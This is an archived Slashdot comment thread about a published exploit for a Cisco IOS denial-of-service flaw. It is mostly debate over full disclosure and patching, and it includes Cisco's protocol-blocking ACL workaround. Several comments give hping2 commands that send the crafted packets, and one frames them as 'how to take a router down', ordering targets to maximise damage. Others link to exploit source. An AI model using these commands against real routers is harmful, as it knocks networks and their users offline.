Slashdot Mirror
Exploit Available for Cisco IOS Vulnerability
GNUman writes "Cisco's IOS vulnerability, posted by Slashdot and CERT, has now a published exploit available, as reported recently by CERT. While there are some some articles claiming that the Internet survived a major flaw, maybe with a publicly available exploit could script kiddies start creating havock?. jerw134 wanted to start a pool to find out when the exploit would be publicly available, here's the answer."
About them Script Kiddies,
the internet's old plight.
Goin' all around,
usin' hacks they didn't write.
Them Script Kiddies lurk the net,
as devious little foes.
Keep them admins well employed,
and keeps them on their toes!
When Script Kiddies learn a trick,
it makes for one tight spot.
If you ain't patched up to date,
think again, because you ought.
How to be a Script Kiddy,
logon the net ad hoc.
Google for the hack you want,
and start your own havoc.
A programmer is a machine for converting coffee into code.
...the 'sploit is more easily available than the fix!
Anyone else gone through hell today trying to get the patch from Cisco?
Grrr... >-/
Hehe, good to see the creator gave admins plenty of time to patch / resolve problems with their Cisco gear...
If you haven't yet received notification from your NOC that they're going to be doing maintenance, you really need to impress upon them to get this fixed. In a nutshell, this flaw could allow a malicious hacker to shut down traffic to your servers.
Want to improve your Karma? Instead of "Post Anonymously", try the "Post Humously" option.
Right, only now the webpage sucks because it's black and white.. ;)
I won't brag about the $10,000 bonus check I received from hitting that benchmark...
:P
Too late. Now how are we supposed to believe the rest of your story?
Now that it's been published, and Slashdot has broadcast it nice and loudly, surely the number of script kiddies planning on making use of this is significantly increasing. Not that I'm complaining about it being known - it'll really make certain people get their behinds in gear to fix it - but I'm sure we'll be seeing how serious of an exploit this is soon.
Let's see if we get significant network outages anywhere on the interenet anytime in the next few days/weeks...
"You know your god is man-made when he hates all the same people you do."
You're right on the money with the "maturity" comments, Jack. The way technology has been running, we have been in a constant state of trying to learn something new. We've never really had a chance to get "really good" at some of our technologies, before the next version or replacement technology arrived.
The Cisco situation is not due to bleeding edge issues though. They should have found this problem sooner.
Surely you meant to say Sisqo?
It's also a shame we have to pat ourselves on the back a lot on slashdot. And as long as you're not bragging about $10k bonuses, make sure to not tell us how you didn't spend it on the EFF and FSF. ;-)
Beware he who would deny you access to information,
for in his heart he dreams himself your master.
Ok, maybe it's just me, but why is it that I have to provide Ciso with serial number, date of purchase and the name of my cat to get this fix? I mean - the fix is software, and it will only work on Ciso units. So - for crying out loud - put the patch on an FTP site and get over with it. Jumping through hoops to get the patch isn't going to speed things up.
My employer (U.S. Gov't) is too cheap to buy Cisco equipment! =P
Fascism should more properly be called corporatism because it is the merger of state and corporate power. -- Mussolini
coincidence?
or perhaps someone in my subnet finally figured out how to mirror torrentse.cx?
They'll be creating something but I don't know what. Hopefully it won't resemble havoc.
Thanks,
--
Matt
What kind of graphics were these? They should have been already optimized to allow for quick loading.
Unless you're talking about high quality TIF's B&W vs. Color should not be making a difference in your load times.
-- taking over the world, we are.
Abstracted high-level tools are what gets jobs done. I wouldn't recommend Java, VB, and C# though - Personally I get things done best with Perl.
-toomuchPerl
Once again we see the power of open source! From anounced flaw to exploit in two days. Beat that Microshaft!..... Oh.... Wait.... This is not a good thing is it....
Papa Legba come and open the gate
You sir are the best troll who doesn't know he's a troll I've ever seen!!!!
1. No sig. 2. ???? 3. Profit!!!
This was seen as activity on the net last night by some of the MSS firms. It seems post-patching of the Cicso boxes results in higher CPU utilization for a godd while. Not sure why yet, but maybe due to all that bad traffic...
Wow, nice troll. I think that deserves a golf clap for your efforts.
*polite applause*
Thanks,
--
Matt
Black and White graphics load on an average Olog(n) faster than color ones? Mel Brooks gave you that formula?
News flash: Web-based technologies change monthly, if not weekly. If we waited for them all to mature, we'd still be viewing Lynx compatible pages.
Also, those of us who build for the web have to deal with an incredibly variable environment (OS, browser, connect speed, screen size, language, etc). Some high level abstraction is necessary, unless we want to target just 1 small audience (sadly, many web developers do so).
Idealism is nice, but standing on a soapbox screaming 'Be Patient!' is not really practical given the tech-o-the-week world that the web is right now.
I don't expect the best social skills (we're geeks, that's not what we do), but you could at least try to see the big picture before you espouse ivory tower philosophies.
(whew, I can feel my karma draining, but it's worth it).
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
WHOA! Apologies -- I replied to the wrong thread. My reply was to the thread starter that, aside from being ridiculous, is obviously a troll.
Thanks,
--
Matt
I've already compiled this and tested against an internal router, fills up the input queue quite nicely. Requires libnet.h
-orbit0r
This guy is pretty well disguised as a troll. This comment gave him away though.
Glad I dodged the bullet, I've got every last router patKL()*$OFD_)#@ [LINK DOWN]
Thats a bigger load of bullshhh than I've ever seen before, and thats including all of high school! Its times like these /. needs a 'retarded' moderation.
Thanks heaps.
Regards,
Cisco Systems.
If I'm reading this page correctly, the protocol type of the packet that causes the problem appears to be the PIM protocol:
/etc/protocols
grep 103
pim 103 PIM # Protocol Independent Multicast
"I drank what?" -Socrates
> As Leon Brooks sums it up in his famous book "The Mythical Man Month"... Leon hit's the nail right on the head....
It's a shame we don't teach IT people the names of other practitioners in their field, or how to use apostrophes.
That'd be *Fredrick* Brooks.
And Bob.
2*3*3*3*3*11*251
What an insight!!!!!!
I'm sure that the coming site support teams will talk a loooong time about the _real programmer_ guy who's been there before them.... Imagine the following:
- Hey, Joe, how the hell is this page header generated.....ooooooh, an executable....Nice!!!!;o))))
You know, I should agree that the nunmber of people in the web programming that don't have a clue what exactly they're doing is significant, that doesn't meen that you should come with a kernel module every time you want to generate an xml file.....
1. No sig. 2. ???? 3. Profit!!!
Ok, this post really bothers me. In any complex system, there are bound to be bugs. I seriously find it hard to believe that if you tackled something as difficult as networking, spent years working on it, would have a finished product that was 100% error free. The word "mature" is just a label. It is meaningless in reality. I agree with you that people should use the right tool for the job, but comparing switching out color pictures for B&W ones and translating code in to C with routing and switching is like comparing a computer that can win at tic tac toe to a computer that can't be beat at chess. The fact of the matter is, Cisco is used by millions for their networking needs. If you think you can produce a more "mature" product that miraculously has no bugs then please do so. I guarantee you will be a rich man. The unfortunate thing is, that most likely by the time your system is mature, Cisco will have a product out that makes your device obsolete.
Support a great indie game: http://www.abaddon360.com
Today?
RR in upstate NY has bee dog-ass slow for 2 days straight now... despite the "network status" page being filled with "area down for cable maintenance/upgrades" for 3 days.
Oh look.. it says there's nothing wrong in my area.. bullshit!
No unauthorized use. Trespassers will be shot. Survivors will be shot again.
were these radical improvements implemented on linux 9.0?
Whereof we cannot speak, thereof we must be silent. --Ludwig Wittgenstein
Importance of shaming those who published this exploit
There was very little time to act upon the new IOS version that Cisco provided to the public. The software upgrades were available to the public on Thursday morning at 00:00. CERT made their announcement about 15 minutes later. Today, the exploit is public. That is less than 48 hours to upgrade the hundreds of thousands (if not million+) Cisco routers across the world.
This is the most important security event effecting the Internet since the root DNS server attacks some time back, and this one is potentially much more severe. I have been surprised at the lack of media attention of this issue, or how some of my technical colleges have treated it. They don't seem to understand how many Cisco routers are out there.
It needs to be shown that by making the exploit of this vulnerability public so soon, the persons who did this only did so for publicity gain at the expense of others.
They hurt others to profit themselves, and that is no more cool than slavery is. And what did they get out of it? "My dick is bigger than yours."
I just don't want this to pass over and the people who made this exploit public think that what they did was cool, or that they are going to get a lot of admiration or karma for it. If they like the Internet, which they probably do, they just did the most harmful thing to it as they could have possibly done.
1. whois says your web address is not even registered.
2. I wonder what technology really is "mature" bofore it becomes out-of-date, these days.
You can find the original exploit here.
Imagine your typical packet kiddie running dozens of instances of the following pseudocode on his farm of a few hundred trojaned boxes:
}
If you haven't patched already - do it now.
In this post, he said:
Writing websites in C is generally a very bad idea. It does horrible things to the security - introduces buffer overflow problems. And the speed increase, when it even exists (Java's performance is better than most people think), is not worth the extra programmer time.
In an older post, he said:
...so, apparently, he mostly uses the interpreted languages he just dissed stupidly.
The rest of the post is just stupid buzzwords:
More colors = more information = more time to download, but that O(log n) is stupid and wrong. And the other stuff is even more gibberish. This exploit has nothing to do with web applications, anyway.
Relax. This news has been going around the various vulnerability mailing lists for over a week now. Slashdot is late to the party (rightfully so).
The discoverer notified Cisco and everyone else, but held back on the exploit code until Cisco had a chance to work on it. Now that the word is out as well as the patch, don't waste time here when you should be patching your CATs (or looking for a new job).
sheesh.
I have something in common with Stephen Hawking...
Cisco released the fix two days ago to backbone providers. Other large customers could get the fix early yesterday. If you're affected by this vulnerability and it's not fixed yet:
It seems like Cisco handled this one correctly with the providers. I'm not sure how well large customers were handled, my guess is the .edu folks probably got screwed again.
----- obSig
Great! You replaced their interpreted languages with C! But...
What's the lowly webpage designer going to do when *gasp* they want to change a page? Are they going to have to go down into C source, and have to change it? The webpage designer probably is going to really screw things up becuase the page needs changing. C may be fast, but for webpage design, it's probably not the right tool. If you have a half-decent server (Resin, for example), Java's not going to be slow. And JSP is going to be MUCH easier to maintain that C.
And as far as black-and-white graphics, I hope the site still looks good... There are other image optimizations that you can do, and that's probably made some of the difference.
Quack, quack.
You say this as if it were a disadvantage. Do you also consider access ramps near buildings to be eye-sores, and do you routinely park your cark on the spots reserved for the disabled?
Lemme tell you: lot's of people don't use lynx by choice, but because they have a disability (blindness) that prevents them from using other browser. Text-only browsers may be used together with a braille line, or a text-to-speech synthesizer to enable the blind to experience the web.
Franky, web designers who pride themselves that their pages are not lynx compatible are dorks.
Also, those of us who build for the web have to deal with an incredibly variable environment (OS, browser, connect speed, screen size, language, etc).
Rather than building specific versions of your page for your target, think of building target-independant pages. Stick to standards. Stick to "minimality principle": If all you want are buttons with pretty pictures, uses gif images, rather than flash animations. Oh, and add an ALT tag too, for the sake of your blind visitors.
Idealism is nice, but standing on a soapbox screaming 'Be Patient!' is not really practical given the tech-o-the-week world that the web is right now.
So, just explain to your management that your "flashy" website exposes your company to multi-million dollar A.D.A. lawsuits. Maybe then they'll understand better.
I just tried this on our routers at work, it does not appear to work. I did n tice som pkt lss but a r nn
Bad boys rape our young girls but Violet gives willingly.
I had the impression that routing was a fairly straight-forward task and that 100% reliable software should be available for the routers. Has Cisco added frills to such an extent that the basic routing is compromised? Is this current problem associated with unnecessary features?
I have 5 25xx's and 2 1601's sitting on my desk until I can get enough ram to run the new fixes.
I really should just pull them out of service, but hey, they work.
You don't read a lot, do you (or don't read the correct mailing lists)? The notification regarding this exploit went out some time ago. The discoverer worked with Cisco, releasing a notification regarding the exploit and some general information regarding cause and severity.
THEY HELD BACK ON THE EXPLOIT CODE UNTIL CISCO COULD DEVISE A PATCH.
Larger customers (ISPs, etc.) were taken care of in advance of the general public notification. Independent parties were no doubt already working on their own exploit code. It's quite common to release the patch and the exploit code at the same time; in fact, some parties prefer to release 0-Day exploit code... let's just be glad these particular folks didn't.
I have something in common with Stephen Hawking...
That's less than 48 hours, depending on which timezone you live in. Should be an interesting weekend for some.
You must be a mac user...get it...CISC blow? Aww never mind...
Any good suggestions on scripting the upgrades? What happens if you have over a few hundred routers? Life sucks I guess.
Back in middle school, where they told us all, "here's exactly what drug x looks like, what it does,and how to get it & use it... but please don't use it. That would be bad!" :) aieee!
4 years later... dang! Why are all the students on crack?
stuff |
Importance of shaming those who published this exploit
Why? Most ISPs are very grateful to have something to test if their countermeasures are effective.
Do you really want to upgrade all your core routers at once, and take the risk of introducing a bug which brings down your whole network? It's often better to apply some workaround and schedule an incremental update. In this case, you really want to test if your workaround is effective.
Your colleagues don't realize how many Cisco routers are out there? What, are your colleagues monkeys or something? That's like saying they didn't know how many copies of windows are running out there. Man, do I feel sorry for you. How many emails do *you* get a day that consist of "What's my password?" ?
-Looking for a job as a materials chemist or multivariat
No. The webdesigner will create a new page from scratch and toss out the C.
"Last one in is a rotten goblin!" - Kepp
Truly, I'm amazed at the number of things you can identify Olog(n) speed increases in: FreeBSD, custom algorithms, cache hits, Unicode, RISC chips, Extreme Documentation, modern compilers....
That, combined with your uncanny ability to cite "The Mythical Man Month" in every single post as well as to consistently get modded down to "0, Troll" or lower makes me wonder if you even know what log(n) means, or if you just have a BS generator on your computer producing these painfully self-promoting posts.
A big middle finger to all of the idiots that don't belive in full disclosure:
Cisco IOS Exploit
You can also easily create the exploit using hping2.
Heres a link to the source in b64 format, you can extract it with:
openssl base64 -d -in cisco.txt -out cisco.tgz
Happy testing!
/* * pope1 */
Here the exploit: http://www.securitylab.ru/_tools/shadowchode.tar.t ar .tar.gz file, incorrectly named.
It's
:wq
You discovered the ruse. Click here to claim your prize. *
* Prize not guaranteed
Black holes are where the Matrix raised SIGFPE
The following access list is specifically designed to block attack traffic. Note that the attack traffic can include spoofed source addresses. This access list should be applied to all interfaces of the device, and should include topology-specific filters. This could include filtering routing protocol traffic, management protocols, and traffic destined for the internal network. Protocol 103 is Protocol Independent Multicast (PIM), which is a commonly deployed application in multicast networks.
Interfaces with PIM enabled have not been found to be vulnerable to exploit traffic with protocol
103; PIM traffic may be permitted to those select devices.
access-list 101 deny 53 any any
access-list 101 deny 55 any any
access-list 101 deny 77 any any
access-list 101 deny 103 any any
!--- insert any other previously applied ACL entries here
!--- you must permit other protocols through to allow normal
!--- traffic -- previously defined permit lists will work
!--- or you may use the permit ip any any shown here
access-list 101 permit ip any any
= Grow a brain...
In the cisco workaround they say to deny 53 any any.
Now wouldnt that block all incoming and outgoing DNS lookups?
As I mentioned in your other post about this, this is *not* the CatOS patch. Cisco discovered this themselves. The discoverers did have to work with Cisco, since they were Cisco.
No one outside Cisco had seen this until a few days ago. The problem is, once Cisco announced it, there were only so many combinations that could cause the problems they were mentioning, and someone found them, and posted it to Full-Disclosure.
With respect, you're partially right, but only partially, and the half-accurate stance you suggest is both attractive and dangerous.
From a moral and ethical standpoint, yes, many exploit postings are done for bad reasons - to garner street cred, create havoc, etc. (Of course, some are posted to force an issue, or as a necessary part of getting information to those who need it to fix their systems, but that argument can be found in plenty of other places, so no need to rehash it here.)
The thing to remember: from a practical standpoint, none of that matters one #$@% bit. Sure, it would be nice if "they" could be restrained by shame or any number of other things; it would also be nice if everyone's intelligence doubled every year. Bets, anyone?
What's important is dealing with the results, not wishing for stuff that would be nice but is highly unlikely to ever happen. When flaw n shows up, we need to fix it or mitigate it as well as we can. Hopefully we can even learn from the flaw, and avoid similar ones in the future. Or, if we can't avoid getting nailed, we go with a fallback plan. ('Course, if things go badly enough, the only backup plan may be "Make your peace with $ENV{DEITY} && die();" but that's a separate issue. :) )
I'm not saying that shaming a malefactor is a bad thing - if it improves the state of the world, great. However, it won't solve the immediate problem unless you can do it for every case, so for purposes of safety you might as well put effort into something that will actually help. When we're defending systems, we need to assume that attackers will do their worst, then plan and act accordingly. Avoiding a hole in our armor, or patching one when we find out about it, is much more logical than trying to get people to keep quiet about it.
For instance I was able to reduce the load time of a very well known and heavily traveled Fortune 500 website by moving all the graphics to black and white only
sound more like you were working for a satanic cult...
I just realized I made a small error in the above pseudocode. If you successfully hang closer routers you won't be have connectivity to more distant ones, so distant routers should be tried first. If the for loop is changed to read for $hopnum ($#hops..5), the effect is much greater assuming an equal number of vunerable routers.
Patch your vunerable Cisco gear ASAP!
Without full disclosure, what % of the routers out there would be patched right now? 10? Maybe.
It sounds to me like Cisco needs to get their genius engineers together to come up with a better way to distribute IOS images - one that does not involve e-mail, perhaps!
What the people did _was_ cool. They contacted Cisco a while back. Then they released the exploit almost *2 days* after the patch was announced.
Nice try bringing slavery in to this. That's rediculous.
"most harmful thing to it they could have possibly done." Please. Even if they released it 2 seconds before the patch was available, the Internet may have had instability for a day or two while Cisco ships out CDRs to everyone so they can fix it.
To those that choose full disclosure for security - I applaud you! I really appreciate having a program available that allows me to test if my systems are vulnerable and remain vulnerable post-patching.
I am not against making the exploit public at all -- just not within the first few days of the exploit discovery. Considering the quantity of systems effected and the fact that many Cisco devices are remote makes patching difficult.
Personally, I want to throw the exploit against some of my own equipment just for fun too.
There will be Cisco devices vulnerable to this exploit for years to come. As a consultant, I commonly come across old Cisco routers that have not had their software upgraded in years. Not every sysadmin knows how to deal with a Cisco -- they just pass traffic through it.
There'd been a bunch of stuff going around on FD about it that I was under the impression that the two subjects were related since the effect was largely the same (send specially-crafted packets, port fills up, shuts down, requires reboot of switch).
I still say the release of exploit code is no big deal in this case. As you said, the combos were limited, so anyone with half a clue could figure it out without someone releasing code.
I have something in common with Stephen Hawking...
I like full disclosure -- just not within 48 hours of such a major vulnerability.
Almost two days is not sufficient time given the quantity of systems that this problem effects and the severity of the problem.
News flash: Web-based technologies change monthly, if not weekly. If we waited for them all to mature, we'd still be viewing Lynx compatible pages.
...and what would be so wrong with that? I was reading slashdot yesterday with lynx. Unless there is a bloody good reason for a site to be chocked full of graphics (e.g. a pr0n site, or one with photos illustrating "how to do X", etc.) it should be accessible to lynx. Why? Well, if you want your information to be available to the widest number of people possible, you have plenty of text. If you want you page to load fast, you have plenty of text.
"Weapons should be hardy rather than decorative" - Miyamoto Musashi
I think that goes for OS's too
why don't you just apply the workaround (block the 'exotic' protocols) ?
#include "coucou.h"
I think your sig should be "Thomas J. Advertisement interim CEO/Founder/Shameless Slashdot Shill - Melior, Inc."
It IS a disadvantage.
Most folks do not still want text only pages. I know that this is a raw deal for blind folks and the like. The fact is, most clients are not interested in websites that look like they are from 1996.
I actually try to build 2 years behind, so older browsers can handle my code, and a reasonable amount of time for upgrades is allowed.
I am a _huge_ believer in standards, actually, but dealing with clients (in both business and browser sense) that are not is exceptionally difficult.
Unfortunately, web technology was not designed for the disabled to use easily. This is slowly being worked on now, but it's not something that will be fixed overnight. Again, that's a pretty shitty deal, but it is what it is.
I understand your anger, although I think you misunderstand me; you might be better off _not_ assuming malice or insensitivity on my part. You would also be mistaken in assuming that I make 'flashy' sites. I try to make them as usable as possible. Good developers/designers will do that. But it is impossible to cater to all possible audiences right now.
Your points are good, but bear in mind the complexity of the situation before assuming that I'm just some insensitive bastard, ok?
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
Then I don't get fancy new gear!
The standard for web development has moved past Lynx. You may not like it, but 'tis true.
Incidently, few websites expect the 'widest number of people possible' to visit. Most have a fairly specific demographic.
Ok, someone call off the Lynx hounds!!!
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
For those of you who are attempt to workaround this, and happen to have hping2, here's how to do it. To get the TTL, just ping the destination and subtract from 255, for instance a ping with TTL 251, you'd enter 4. Choose which protocol to use of the four.
/dev/urandom
hping2 (dest ip) -0 -t (ttl from above) -H (53,55,77, 103) -d 128 -E
The CatOS bug only kills management traffic to the router - telnet, ssh, http, etc. Traffic going *through* the router remains unaffected.
The IOS bug causes the affected interface to drop all incoming traffic, management or production.
Now it's possible that a common bug could have causeed both, and it's also possible that the CatOS bug prompted Cisco to take a closer look at the IOS code and led to the discovery of this one. But by all accounts, the IOS bug was discovered internally by Cisco engineers. The exploit was found by someone else after the vulnerability was announced.
Ah, but the insightful one gets the point :)
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
Here's how to take a router down:
/dev/urandom
Assuming you're using debian.
apt-get install hping2
ping
Subtract x in ttl=x from 255
then run:
hping2 -t -H 55 -d 128 -E
enjoy...
and remember.. if you take down your ISPs gateway first you won't be able to do further damage.. start from the outside in.
Um... yeah, ok. Misusing that metaphor isn't making the point, and I'm tired of this. fuck off.
"Faith: Belief without evidence in what is told by one who speaks without knowledge, of things without parallel." - A.B.
If you look at the release dates of some of the code that is not vulnerable to this attack, it goes back to early June. To me, it looks like this was identified almost two months ago. The question then is: Was this suddenly announced once a planned mile-marker in IOS revisions had been met....or once they suspected the exploit was in the wild?
That is less than 48 hours to upgrade the hundreds of thousands (if not million+) Cisco routers across the world.
So do them in parallel.
Hell, give me access. I'll upgrade a few million routers in less than 48 hours, no prob.
And I am a lazy pothead sys admin. I don't even work on routers.
I love his misuse of big O notation. Olog(n) faster? What by the size of the picture? No because If you change a constant value (bits per pixel) it will have a constant, not logorithmic effect on the size.
Image has 1000 pixels with 32 bit colors per pixel no compression: Size = 1000x32bits = 32000 bits.
Image has 1000 pixels with 2 bits of color per pixel (although 8 bit greyscale would be better) = 2000 bits.
Now it seems a full color image is 16x large than the bw one, if you change the number of pixels the savings in size will be constant.
Everyone that disagrees with me is a paid shill
Why does the author put "(void)" before every fprintf()? Can it be some kind of hidden signature?
How is this a big middle finger to people that don't believe full disclosure is a good idea for something of this gravity? Major ISP's and Major providers (for which I work) didn't hear about this but 48 hours before the exploit was made public.
Cisco tried their hardest to prevent info from getting out to make it easy to create an exploit, but data was leaked. What has this done? It's left hundreds of thousands to millions of routers, with not nearly enough admins to patch, vulnerable to the losers who have already posted (in reply to your message no less) "Is there a win9x version?". What do you think HE is going to do with it? Test his network? Hah!
I believe in full disclosure, and I wish that I had been more in the know during this process, but I have to ask myself why? I wanted to be more in the know so that I could feel more important than other people. Boy, that's selfish. Maybe you should consider that there are more important things than getting a 'sploit -- like giving the INTERNET an opportunity to respond to a major threat.
That, or you could be segmented from your favorite pr0n site. Your choice.
Tell me, Jack, is daylight savings time right around the corner? ;o)
here
" I'm going to say an exploit by tommorow. End of the internet by Sat. All back to normal on Monday"
Rus
Cheap UK and US VPS
worked against my 1005.. sadly :P)
As I first saw this, and figured you'd mis-spelled 10053, because there really SHOULD be an "e" at the end... Then realized that "loose" doesn't fit in the sentence.
Ah well. Stupid me.
-Ben
I have no problem with your religion until you decide it's reason to deprive others of the truth.
So far it has been 4 hours since my e-mail... no response whatsoever
Lemme guess.
Your request for help to cisco.com is not really going to go to 198.133.219.25 but to, uhm, a new different, uh, help center, that will be happy to send you an IOS sploit^H^H^H^H^H^H update to have you up and going in a jiffy.
"Provided by the management for your protection."
The 2500 series has been EOL'd. May want to check their web site and use it to justify new 2600XM's (the non-XM 2600's are also EOL'd, so I wouldn't recommend purchasing them).
You serious? Sure, go nuts. I look forward to seeing what happens when the build you pick for a router three hops down doesn't support the STM-4 card you had in there, and stops you reaching the 20 networks behind it. Oh, and there's one over here that's running a new build with a BGP bug, so these 100 have fallen off the network. And three of these six in New York just plain didn't come back, we're not sure why yet. You've got out of band access to them all, right? right?
Upgrade with care. Even the most reliable kit develops problems a small percentage of the time; a small percentage of a lot of kit is a lot of kit.
Dave
What incentive would we have to defend ourselves if we didn't have predators to threaten us?
Sounds like smarter living through adoption of stupidity, and a long way around the block if you ask me.
Maybe corporations need to think a little longer and a little harder before they downsize their IT staff? :)
I was contacted last night by UUnet, and tonight they are adding ACLS to all of my edge routers.
:) I love outsourcing.
Myself, I'm drinking a beer.
Well, I would hope that if one is running a shop with a large quantity of Cisco boxes, one would have taken the neceesary time to lock down these boxes to prevent unnecessary access to them. Whether it means stting up ACLs at the edge of your network to prevent bogus/unauthorixed access to the devices/interfaces, or ACLs on the boxen themselves this should have been done a loong time ago. Granted you don't want an excessive (or any, for that matter) ACLs on your core router. A good engineer, IMNSHO would have limited up the amount of amount of protocols/sources accpeted by critical pieces of infrastructure. ;-)
As an aside, what is a good time to release the exploit into the wild? What if the exploit was exploited _prior_ to Cisco getting the word out on the recommended fix? Would you have preferred 72 hours, or maybe after you returned from your summer vacation
I would presume s/he's casting it to type void so that a very pedantic person wouldn't complain about her/his not checking the return status.
The truth of the matter is that Cisco is not the only network equipment maker out there. And there's a good chance that a lot of routing code that IS out there is shared by several different vendors' equipment. How could makers of non-Cisco equipment test their equipment to ensure that it doesn't suffer the same flaw without any specific details and without an exploit? How could customers who own non-Cisco equipment be sure that their networks are safe?
Despite what EULAs say, most software is sold, not licensed.
I just have to hold out a little bit longer! The economy's going to pick up, and we'll all be riding on the edge of the dot-com bubble again. We'll all be millionaires! And then, Cisco 7000's for everyone!
Bob Brooks (dear old Dad) has made significant contributions in the Australian mining industry, his twin Colin Brooks is a well-known consulting geologist, their brother Don Brooks runs Harvestaire, and grandpa Charles Alfred Brooks made himself famous for finding things out about sports that helped people to do them better, but yes, the man you really want is Fred Brooks, famous for statements like "adding manpower to a late project makes it later".
:-)
My main claim to fame seems to be for abusing people in public (-: For which I am indebted to several skilled exemplars, who probably all know who they are
Kudos to Russel Steicke for pointing out this post to me.
Got time? Spend some of it coding or testing
Maybe, but in reality, what's happened here is a vendor has just come to you and said, "Hi there! Guess what, there's been a bug in our code since day one, an amazingly simple little thing that no one has noticed till now. You should trust us to find these things earlier, but we've violated that trust and proven that we're no good at catching bugs in IOS. The fix is to run this sparkly new IOS that no one has ever used before! Please, install this on all your routers and switches within the next 36 hours because there's gonna be an exploit out."
The first thing that any logical person who's dealt with a vendor in the past must think is, "Oh crap, new, untested version that I have to deploy to all of the routers across my enterprise within 36 hours. There's a good chance that this vendor who has proven they can't catch bugs is going to have another bug in the software, causing my network to crash".
In this case, it doesn't matter how many members of the IT staff you have or don't have. If they were able to keep their information closer to the vest for another week or two (which they were trying to do, but people who believe in immediate full disclosure decided to derail that), businesses would have been able to burn in the new code to make sure that all of their requirements are met and that there are no other bugs that regression testing would have found.
I am in CCNA training right now (Sem 3 done), and I can bring a router from nothing to fully operational using different protocols and routing methods in a short matter of time. I don't know how to make a specially crafted IPv4 packet. Anybody know how to do this? And does anybody know the code to the said packet? Or is this just a specially long packet? I'm curious.
I got nothin'.
You're right, I was talking out my ass.
;)
But I bet maybe you and I could do it, with enough time, a database of details and perl/expect.
There are only a certain number of possible combinations of Cisco router hardware. If we knew their current state of hardware and software revisions, it should be possible to custom build an ios prom or patch the existing os to bring it in line with production.
Well, that's the way I look at these things. Let the software hash out the details, just make sure you get all the bases covered and run the script through intensive QA before deployment.
I bet a Cisco CCIE could do it. They can do anything.
Ingress filtering on a Cisco via ACLs is only effective on the 75xx class routers.
On other Cisco IOS products, the input queue processing preceeds the ACL processing, so these devices can be DoS'd no matter what ACLs are in place.
You should contact Cisco PSIRT and tell them to correct their adviory if this is really the case.
Thanks for being honest. :D I gotta admit, I was feeling a bit ratty last night when I posted too.
./reload-all -- but I'd be a bit screwed if any one of them had a funny I didn't know about.
:)
Thing is, in theory the upgrades would go fine; in practice they won't - you'll hit SOME funny that you couldn't have predicted, and the consequences are just too serious to let it go. The longer you have to plan and enact the upgrade, the smoother it'll go, and the less hurt you'll cause your customers.
I've got an 8-hour day planned tomorrow (Sunday) do upgrade our network at work, and we're looking at that much time just to do the critical boxes (20-odd) with leeway for funnies, and in an order that lets us recover if it goes to shit somewhere. We'll be doing a little parallel stuff, but not much. In theory I could upload the IOSes to the flash cards tonight, log in tomorrow from home and run
You're right though. Cisco CCIEs are one step from godhood. I fear them.
Dave